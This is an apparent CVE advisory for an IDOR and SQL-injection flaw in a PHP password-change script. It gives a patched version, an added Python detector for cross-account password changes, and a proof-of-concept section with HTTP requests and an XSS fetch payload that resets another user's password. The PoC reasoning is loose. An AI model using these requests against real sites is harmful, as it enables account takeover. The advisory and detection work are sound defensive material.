# CVE Report Summary: 1000project IDOR Vulnerability - Password Modification

## Vulnerability Overview

* **Vulnerability Type**: IDOR (Insecure Direct Object Reference)
* **Severity**: High (CVSS 3.1: 8.8)
* **Affected Product**: 1000project (Portfolio Management System MCA)
* **Affected Version**: 1.0
* **Vulnerable File**: `update_passwd_process.php`
* **Root Cause**: The script blindly trusts the `$_SESSION['temp_user']` variable to identify the account being modified, without verifying that the current user is permitted to change that account's password; the update query is also susceptible to SQL injection.

## Impact Scope

* **Account Takeover**: Attackers can change the password of any user.
* **Data Leakage**: Sensitive information in compromised accounts can be accessed.
* **Privilege Escalation**: Higher privileges can be obtained by targeting administrator accounts.
* **Identity Theft**: Personally Identifiable Information (PII) may be compromised.

## Remediation

1. **Session Management**: Use session variables that cannot be influenced by the client, store the authenticated user identity server-side, and validate the session on every request.
2. **Access Control**: Always verify the user's identity before performing sensitive operations, implement Role-Based Access Control (RBAC), and log all password change attempts.
3. **Input Validation**: Validate all user input, use prepared statements for all database operations, and enforce password strength requirements.
4. **Security Monitoring**: Monitor for anomalous password change patterns, rate-limit password change attempts, and alert on suspicious account activity.

## Remediation Code (Recommended Fix)

```php
// update_passwd_process.php - FIXED VERSION
include("connection.php");
session_start();

if (isset($_POST['change'])) {
    // 1. Use the authenticated session user, not temp_user.
    //    $_SESSION['user'] is expected to be set during login; refuse the
    //    request outright if no authenticated user is present.
    if (empty($_SESSION['user'])) {
        http_response_code(403);
        exit;
    }
    $current_user = $_SESSION['user'];

    $newpassword = $_POST['newpassword'] ?? '';
    $cpassword   = $_POST['cpassword'] ?? '';

    if ($newpassword !== $cpassword) {
        $_SESSION['change-passwd'] = "Password does not match. Please Provide valid one.";
        header("location:changepasswd.php");
        exit; // stop processing after the redirect
    }

    // 2. Use a prepared statement so the email and password are bound as
    //    data rather than concatenated into the SQL string.
    //    Note: the original schema appears to store reg_passwd in clear text.
    //    Hashing with password_hash() (and password_verify() at login) is
    //    recommended, but also requires changing the login check, which lives
    //    outside this file.
    $stmt = $conn->prepare("UPDATE reg_details SET reg_passwd = ? WHERE reg_email = ?");
    $stmt->bind_param("ss", $newpassword, $current_user);
    $result = $stmt->execute();

    if ($result) {
        $_SESSION['pass-succ'] = "Password is changed successfully. You may login now.";
    } else {
        $_SESSION['pass-err'] = "Something is wrong. Please try again later.";
    }
    header("location:changepasswd.php");
    exit;
}
```

## Proof of Concept (PoC)

### Normal Password Modification

```http
# Normal password change request
POST /update_passwd_process.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=user_session

newpassword=newpassword123&cpassword=newpassword123&change=Change

# Result: Current user's password changed
```

### IDOR Attack - Modifying Administrator Password

```http
# Step 1: Attacker logs in as regular user
# Step 2: Attacker manipulates session (e.g., through XSS or session fixation)
# Step 3: Attacker submits password change request
POST /update_passwd_process.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=hacked_session

newpassword=attackerpassword&cpassword=attackerpassword&change=Change

# Result: Admin's password changed to attacker's chosen password
```

### Via XSS Attack

```javascript
// Inject via XSS vulnerability
document.cookie = "PHPSESSID=hacked_session";

// Manipulate temp_user session variable
fetch('/update_passwd_process.php', {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: 'newpassword=hacked&cpassword=hacked&change=Change'
});
```
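The "Security Monitoring" remediation item above (anomalous password-change patterns, rate limiting, alerting) is the one without code on this page. The following is an added example, not code from the 1000project codebase: it assumes the application has been changed to log every password-change attempt with the authenticated session user (`actor`) and the account being modified (`target`), and it runs two checks over such a log: a session acting on an account other than its own (the IDOR signature of this CVE) and a session exceeding a rate threshold. The log format, field names and the 5-attempts-per-10-minutes threshold are assumptions, and the log lines are constructed.

```python
"""Detection logic for password-change anomalies (added example).

Assumed log format (constructed, one attempt per line):
  <ISO timestamp> session=<id> ip=<addr> actor=<email> target=<email> result=<ok|fail>
"""
from collections import defaultdict
from datetime import datetime, timedelta

RATE_LIMIT = 5                  # max attempts per session per window (assumed policy)
WINDOW = timedelta(minutes=10)  # sliding window for the rate check (assumed policy)

# Constructed sample log: s3 changes two accounts it does not own (IDOR pattern),
# s4 hammers the endpoint six times in under a minute (rate-limit violation).
SAMPLE_LOG = """\
2024-01-01T10:00:00 session=s1 ip=10.0.0.5 actor=alice@example.com target=alice@example.com result=ok
2024-01-01T10:01:00 session=s2 ip=10.0.0.9 actor=bob@example.com target=bob@example.com result=ok
2024-01-01T10:02:00 session=s3 ip=10.0.0.7 actor=eve@example.com target=admin@example.com result=ok
2024-01-01T10:02:30 session=s3 ip=10.0.0.7 actor=eve@example.com target=alice@example.com result=ok
2024-01-01T10:03:00 session=s4 ip=10.0.0.8 actor=mallory@example.com target=mallory@example.com result=fail
2024-01-01T10:03:10 session=s4 ip=10.0.0.8 actor=mallory@example.com target=mallory@example.com result=fail
2024-01-01T10:03:20 session=s4 ip=10.0.0.8 actor=mallory@example.com target=mallory@example.com result=fail
2024-01-01T10:03:30 session=s4 ip=10.0.0.8 actor=mallory@example.com target=mallory@example.com result=fail
2024-01-01T10:03:40 session=s4 ip=10.0.0.8 actor=mallory@example.com target=mallory@example.com result=fail
2024-01-01T10:03:50 session=s4 ip=10.0.0.8 actor=mallory@example.com target=mallory@example.com result=ok
"""


def parse_line(line):
    """Split one log line into a dict; the timestamp becomes a datetime under 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def find_cross_account_changes(records):
    """IDOR signature: the authenticated actor changed a password for another account.
    In a correctly fixed application this list should always be empty."""
    return [r for r in records if r["actor"] != r["target"]]


def find_rate_violations(records, limit=RATE_LIMIT, window=WINDOW):
    """Sessions with more than `limit` attempts inside any sliding `window`."""
    by_session = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        by_session[r["session"]].append(r["ts"])
    offenders = set()
    for sess, times in by_session.items():
        start = 0
        for end in range(len(times)):
            # advance the window start until all attempts fall within `window`
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > limit:
                offenders.add(sess)
                break
    return sorted(offenders)


def analyze(text):
    """Run both checks and return the findings an alerting pipeline would consume."""
    records = parse_log(text)
    return {
        "cross_account": [(r["session"], r["actor"], r["target"])
                          for r in find_cross_account_changes(records)],
        "rate_violations": find_rate_violations(records),
    }


if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_LOG).items():
        print(f"{kind}: {hits}")
```

The cross-account check is the one that matters for this CVE: once `update_passwd_process.php` derives the target from the authenticated session, `actor` and `target` can only differ if the access-control fix has regressed, so any hit is worth an alert rather than a counter. The rate check catches brute-force or scripted abuse of the endpoint regardless of which account it targets.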